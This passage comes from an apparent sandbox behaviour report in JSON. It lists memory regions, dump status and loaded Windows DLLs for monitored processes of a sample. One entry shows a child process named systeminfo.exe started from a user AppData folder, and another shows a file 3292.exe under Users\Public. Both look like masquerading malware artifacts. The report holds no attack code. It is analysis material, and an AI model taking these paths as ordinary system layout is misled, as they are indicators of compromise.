[ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964270403, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1336", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:00:40.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965388920, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1337", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:00:40.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965728882, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1338", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:00:40.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967766077, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1339", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:00:40.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1969110999, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1340", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:40.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970227685, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1341", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:00:40.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970812576, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1342", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:00:40.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970976493, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1343", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:00:40.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973433043, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1344", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:00:40.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991655345, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1345", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:00:40.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993934185, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1346", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:00:40.048", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001347-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1347", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:00:40.048", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001348-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1348", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:00:40.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1349", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:40.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1350", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:40.049", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 10387455, "entry_point": 0, "filename": null, "id": "region_1351", "name": "pagefile_0x0000000000860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8781824, "timestamp": "00:00:40.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961104783, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1352", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:00:40.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974474379, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1353", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:00:40.055", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001354-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1354", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:40.063", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001355-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1355", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:40.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 11997183, "entry_point": 0, "filename": null, "id": "region_1356", "name": "pagefile_0x00000000009f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10420224, "timestamp": "00:00:40.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1357", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": "00:00:40.064", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001358-addr_0x00000000021b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 35323904, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_1358", "name": "private_0x00000000021b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35323904, "timestamp": "00:00:40.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 38334463, "entry_point": 35389440, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1359", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35389440, "timestamp": "00:00:40.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1952776192, "type": "region", "version": 1 }, "end_va": 1953300479, "entry_point": 1952856009, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1360", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1952776192, "timestamp": "00:00:40.069", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001361-addr_0x00000000001b0000-size_0x0000000000110000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1114112, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_1361", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:40.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4976639, "entry_point": 0, "filename": null, "id": "region_1362", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:00:40.084", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001363-addr_0x00000000000e0000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 991231, "entry_point": 0, "filename": null, "id": "region_1363", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:40.096", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001364-addr_0x0000000000100000-size_0x000000000000e000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1105919, "entry_point": 0, "filename": null, "id": "region_1364", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:40.098", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001365-addr_0x0000000002490000-size_0x00000000003d1000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4001792, "start_va": 38338560, "type": "region", "version": 1 }, "end_va": 42340351, "entry_point": 0, "filename": null, "id": "region_1365", "name": "private_0x0000000002490000", "norm_filename": null, "region_type": "private_memory", "start_va": 38338560, "timestamp": "00:00:40.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 57344, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1171455, "entry_point": 0, "filename": null, "id": "region_1366", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:40.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1310719, "entry_point": 0, "filename": null, "id": "region_1367", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:40.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 7208959, "entry_point": 0, "filename": null, "id": "region_1368", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:00:40.260", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_7", "image_name": "systeminfo.exe", "monitor_reason": "child_process", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1369", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:41.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1370", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:41.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1371", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:41.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1372", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:41.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1373", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:41.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1374", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:00:41.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1375", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:41.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12458144, "filename": "\\Users\\Public\\3292.exe", "id": "region_1376", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:00:41.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1377", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:41.402", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1378", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1379", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1380", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1381", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1382", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1383", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1384", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1385", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:41.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_1386", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:00:41.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953374456, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1387", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:00:41.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953691544, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1388", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:00:41.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1954012792, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1389", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:00:41.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1390", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:41.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2256895, "entry_point": 1835008, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1391", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1835008, "timestamp": "00:00:41.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_1392", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:41.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6291455, "entry_point": 0, "filename": null, "id": "region_1393", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:00:41.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1954545664, "type": 